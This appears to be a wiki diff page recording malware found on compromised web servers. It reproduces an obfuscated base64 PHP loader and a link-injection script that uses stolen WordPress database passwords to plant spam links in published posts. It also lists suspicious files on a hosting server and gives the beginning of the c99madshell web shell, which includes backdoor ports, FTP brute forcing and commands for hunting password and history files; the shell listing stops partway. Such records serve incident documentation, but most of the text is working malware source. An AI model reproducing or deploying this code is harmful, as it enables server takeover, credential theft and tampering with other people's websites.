TF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0XHg1YlwxMzZceDVjXDc2XHg1ZFw1Mlx4NWNcNzZceDI5XDU3XHg3M1wxNTEiOyAkZXZhMWZZMmIwMjJ6YzhsNSgkZXZhMWZZMmIwNTJ6bzhsNSk7ICRldmExZlkyYm82MXpvOGw3PSRldmExZlkyYjAyMnpvOGw1KCR2YXI2KTsgIGlmKCRldmExZlkyYjBsbHpjOGw1KCRldmExZlkyYjA1MnpvOGwxLCRldmExZlkyYm82MXpvOGw3KSkgew0KIHJldHVybiAkZXZhMWZZMmIwMWx6YzhsNSgkZXZhMWZZMmIwNjJ6bzhsMSwgZXZhMWZZMmJhazFjVjBpcigpLiJcbiIuIlx4MjRcNjEiLCAkZXZhMWZZMmJvNjF6bzhsNywxKTsgfSBlbHNlIHsNCiBpZigkZXZhMWZZMmIwbGx6YzhsNSgkZXZhMWZZMmIwNjF6bzhsMSwkZXZhMWZZMmJvNjF6bzhsNykpIHsNCiByZXR1cm4gJGV2YTFmWTJiMDFsemM4bDUoJGV2YTFmWTJibzYxem84bDEsIGV2YTFmWTJiYWsxY1YwaXIoKS4iXG4iLiJceDI0XDYxIiwgJGV2YTFmWTJibzYxem84bDcsMSk7DQogfSBlbHNlIHsgcmV0dXJuICRldmExZlkyYm82MXpvOGw3OyB9DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3NFwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNjFceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiIpOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f"); ?><!DOCTYPE html> | ||
+ | <html> | ||
+ | <head> | ||
+ | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> | ||
+ | <title>automatical inserter links to wordpress database</title> | ||
+ | <script> | ||
+ | function hide() { | ||
+ | var obj = document.getElementById("message"); | ||
+ | obj.style.display = "none"; | ||
+ | } | ||
+ | setTimeout(hide, 5000); | ||
+ | </script> | ||
+ | </head> | ||
+ | <body> | ||
+ | <?php | ||
+ | DEFINE('DBG', 0); DEFINE('SEP', ' | '); DEFINE('BR', '<BR>'.PHP_EOL); DEFINE('NPOST', 4); DEFINE('LOG_EXT', '.log'); DEFINE('PROC_LOG', 'process'); DEFINE('CON_LOG', 'connect'); DEFINE('REV_LOG', 'reverse'); DEFINE('LIST_DB', 'pass.txt'); DEFINE('ARCH', $_SERVER['SERVER_NAME'].'.tar.gz'); ini_set("display_errors","1"); ini_set("display_startup_errors","1"); ini_set("memory_limit","1000M"); @set_time_limit ( 0 ); @ini_set ( 'max_execution_time', 0 ); $params = array(); $params['pswd'] = "pass"; $params['links'] = "links"; $logs = array(); $logs['connect'] = CON_LOG; $logs['process'] = PROC_LOG; $logs['reverse'] = REV_LOG; echo "<div id=\"message\">"; echo checkInstall($params, "txt"); echo checkInstall($logs, "log"); echo "</div>"; ?> | ||
+ | <h1>Actions</h1> | ||
+ | <form action="<?=$_SERVER['SCRIPT_NAME'] ?>"> | ||
+ | <input type="radio" name="flink" value="links_txt" >links.txt | ||
+ | <input type="radio" name="flink" value="links1_txt">links1.txt | ||
+ | <input type="hidden" name="a" value="post" /> | ||
+ | <input type="submit" value="post links"> | ||
+ | </form> | ||
+ | |||
+ | <a href="?a=reverse">reverse posting</a><br /> | ||
+ | |||
+ | <h2>Logs</h2> | ||
+ | <a href="?l=connect">connections.log</a><br /> | ||
+ | <a href="?l=process"><?php echo(PROC_LOG) ?>.log</a><br /> | ||
+ | <a href="?l=reverse">reverse.log</a><br /> | ||
+ | <br /> | ||
+ | <a href="?d=true">archive logs</a><br /> | ||
+ | <div style="margin-top: 15px; clear: both; border-top: 1px dotted #999;"> | ||
+ | <?php | ||
+ | $flink = 'links.txt'; if(isset($_GET['flink'])){ if($_GET['flink'] == 'links_txt') { $flink = 'links.txt';} if($_GET['flink'] == 'links1_txt') { $flink = 'links1.txt';} } if (isset($_GET['l'])) { showLog($_GET['l']); } if (isset($_GET['d'])) { preDownloadLogs(); } if (isset($_GET['a'])) { if($_GET['a'] == 'post') { postLinks($flink); } if($_GET['a'] == 'reverse') { reverse_posting(); } } function postLinks($flink = 'links.txt') { $lch = fopen("connect.log", "w"); $num_of_bd = 0; $pswds = get_ar_file(LIST_DB); $links = get_ar_file($flink); if($pswds AND $links){ $num_of_bd = COUNT($pswds); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd); $num_of_links = COUNT($links); dbg_prn('COUNT OF DATABASES pass.txt - '.$num_of_bd .'FILE - <strong>'.$flink.'</strong>; COUNT OF LINKS - ' .$num_of_links); } else { fwrite($lch, "!ERR: pswd OR ".$flink."file not exist\n"); return FALSE; } $total_updates = $n_bases = $i_url = 0; foreach ($pswds as $a_line) { $atr = get_db_atr($a_line); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($db->status != "connected") { fwrite($lch, "<span style='color:#fb0000;'>".$db->status ."</span>\n<br>"); } $get_url = $db->fetch_assoc("SELECT `option_value` FROM `wp_options` WHERE `option_name` = 'siteurl' OR `option_name` = 'home'"); if (isset($get_url[0]['option_value'])) { $tmp_url = $get_url[0]['option_value']; } else if (isset($get_url[1]['option_value'])) { $tmp_url = $get_url[1]['option_value']; } else { $tmp_url = "http://"; } if ($tmp_url != "http://") { $find_s_pattern = "/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?> | ||
+ | </div> | ||
+ | </body> | ||
+ | </html> | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | other files: | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | -rw-r--r-- 1 wwwrun www 2922 Apr 2 2013 connect.log | ||
+ | -rwxrwxrwx 1 1000 1000 39481 Mar 28 2013 links.txt | ||
+ | -rwxrwxrwx 1 1000 1000 23690 Mar 29 2013 links1.txt | ||
+ | -rwxrwxrwx 1 1000 1000 1834 Apr 1 2013 pass.txt | ||
+ | -rw-r--r-- 1 wwwrun www 21741 Apr 2 2013 process.log | ||
+ | -rw-r--r-- 1 wwwrun www 0 Apr 2 2013 reverse.log | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ---- | ||
+ | |||
+ | login-116.hoststar.ch | ||
+ | |||
+ | /home/www/confixx/html/include/template/templates_c | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | -rw-r--r-- 1 wwwrun www 8650 May 21 2014 0x1.jpg | ||
+ | -rw-r--r-- 1 wwwrun www 45101 May 21 2014 2014.zip | ||
+ | -rwxr-xr-x 1 wwwrun www 45 May 8 2014 a.sh | ||
+ | -rw-r--r-- 1 wwwrun www 12084 May 7 2014 caps.php | ||
+ | -rw-r--r-- 1 web335 web335 44285 May 7 2014 maz.php | ||
+ | -rw-r--r-- 1 wwwrun www 144201 May 8 2014 nomad4.php | ||
+ | -rw-r--r-- 1 wwwrun www 64512 May 21 2014 rcon.exe | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | nomad4.php | ||
+ | |||
+ | <syntaxhighlight lang="bash" style="font-size:9pt;"> | ||
+ | <?php | ||
+ | if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} | ||
+ | error_reporting(5); | ||
+ | @ignore_user_abort(TRUE); | ||
+ | @set_magic_quotes_runtime(0); | ||
+ | $win = strtolower(substr(PHP_OS,0,3)) == "win"; | ||
+ | define("starttime",getmicrotime()); | ||
+ | if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} | ||
+ | $_REQUEST = array_merge($_COOKIE,$_POST); | ||
+ | foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} | ||
+ | $shver = "2.0 madnet edition"; | ||
+ | if (empty($surl)) | ||
+ | { | ||
+ | $surl = $_SERVER['PHP_SELF']; | ||
+ | } | ||
+ | $surl = htmlspecialchars($surl); | ||
+ | |||
+ | $timelimit = 0; | ||
+ | $host_allow = array("*"); | ||
+ | $login_txt = "Admin area"; | ||
+ | $accessdeniedmess = "<a href=\"http://securityprobe.net\">c99madshell v.".$shver."</a>: access denied"; | ||
+ | $gzipencode = TRUE; | ||
+ | $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server | ||
+ | $filestealth = TRUE; | ||
+ | $donated_html = "<center><b>Owned by root</b></center>"; | ||
+ | $donated_act = array(""); | ||
+ | $curdir = "./"; | ||
+ | $tmpdir = ""; | ||
+ | $tmpdir_log = "./"; | ||
+ | |||
+ | $log_email = "user@host.gov"; | ||
+ | $sort_default = "0a"; | ||
+ | $sort_save = TRUE; | ||
+ | |||
+ | $ftypes = array( | ||
+ | "html"=>array("html","htm","shtml"), | ||
+ | "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), | ||
+ | "exe"=>array("sh","install","bat","cmd"), | ||
+ | "ini"=>array("ini","inf"), | ||
+ | "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), | ||
+ | "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), | ||
+ | "sdb"=>array("sdb"), | ||
+ | "phpsess"=>array("sess"), | ||
+ | "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") | ||
+ | ); | ||
+ | |||
+ | |||
+ | $exeftypes = array( | ||
+ | getenv("PHPRC")." -q %f%" => array("php","php3","php4"), | ||
+ | "perl %f%" => array("pl","cgi") | ||
+ | ); | ||
+ | |||
+ | $regxp_highlight = array( | ||
+ | array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), | ||
+ | array("config.php",1) // example | ||
+ | ); | ||
+ | |||
+ | $safemode_diskettes = array("a"); | ||
+ | $hexdump_lines = 8; | ||
+ | $hexdump_rows = 24; | ||
+ | $nixpwdperpage = 100; | ||
+ | $bindport_pass = "c99mad"; | ||
+ | $bindport_port = "31373"; | ||
+ | $bc_port = "31373"; | ||
+ | $datapipe_localport = "8081"; | ||
+ | if (!$win) | ||
+ | { | ||
+ | $cmdaliases = array( | ||
+ | array("-----------------------------------------------------------", "ls -la"), | ||
+ | array("find all suid files", "find / -type f -perm -04000 -ls"), | ||
+ | array("find suid files in current dir", "find . -type f -perm -04000 -ls"), | ||
+ | array("find all sgid files", "find / -type f -perm -02000 -ls"), | ||
+ | array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), | ||
+ | array("find config.inc.php files", "find / -type f -name config.inc.php"), | ||
+ | array("find config* files", "find / -type f -name \"config*\""), | ||
+ | array("find config* files in current dir", "find . -type f -name \"config*\""), | ||
+ | array("find all writable folders and files", "find / -perm -2 -ls"), | ||
+ | array("find all writable folders and files in current dir", "find . -perm -2 -ls"), | ||
+ | array("find all service.pwd files", "find / -type f -name service.pwd"), | ||
+ | array("find service.pwd files in current dir", "find . -type f -name service.pwd"), | ||
+ | array("find all .htpasswd files", "find / -type f -name .htpasswd"), | ||
+ | array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), | ||
+ | array("find all .bash_history files", "find / -type f -name .bash_history"), | ||
+ | array("find .bash_history files in current dir", "find . -type f -name .bash_history"), | ||
+ | array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), | ||
+ | array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), | ||
+ | array("list file attributes on a Linux second extended file system", "lsattr -va"), | ||
+ | array("show opened ports", "netstat -an | grep -i listen") | ||
+ | ); | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $cmdaliases = array( | ||
+ | array("-----------------------------------------------------------", "dir"), | ||
+ | array("show opened ports", "netstat -an") | ||
+ | ); | ||
+ | } | ||
+ | |||
+ | $sess_cookie = "c99shvars"; | ||
+ | |||
+ | $usefsbuff = TRUE; | ||
+ | $copy_unset = FALSE; | ||
+ | |||
+ | $quicklaunch = array( | ||
+ | array("<b><hr>HOME</b>",$surl), | ||
+ | array("<b><=</b>","#\" onclick=\"history.back(1)"), | ||
+ | array("<b>=></b>","#\" onclick=\"history.go(1)"), | ||
+ | array("<b>UPDIR</b>","#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='%upd';document.todo.sort.value='%sort';document.todo.submit();"), | ||
+ | array("<b>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>Buffer</b>","#\" onclick=\"document.todo.act.value='fsbuff';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>Tools</b>","#\" onclick=\"document.todo.act.value='tools';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>Proc.</b>","#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>FTP brute</b>","#\" onclick=\"document.todo.act.value='ftpquickbrute';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>Sec.</b>","#\" onclick=\"document.todo.act.value='security';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>SQL</b>","#\" onclick=\"document.todo.act.value='sql';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"), | ||
+ | array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"), | ||
+ | array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") | ||
+ | ); | ||
+ | |||
+ | $highlight_background = "#c0c0c0"; | ||
+ | $highlight_bg = "#FFFFFF"; | ||
+ | $highlight_comment = "#6A6A6A"; | ||
+ | $highlight_default = "#0000BB"; | ||
+ | $highlight_html = "#1300FF"; | ||
+ | $highlight_keyword = "#007700"; | ||
+ | $highlight_string = "#000000"; | ||
+ | |||
+ | @$f = $_REQUEST["f"]; | ||
+ | @extract($_REQUEST["c99shcook"]); | ||
+ | ///////////////////////////////////// | ||
+ | @set_time_limit(0); | ||
+ | $tmp = array(); | ||
+ | foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} | ||
+ | $s = "!^(".implode("|",$tmp).")$!i"; | ||
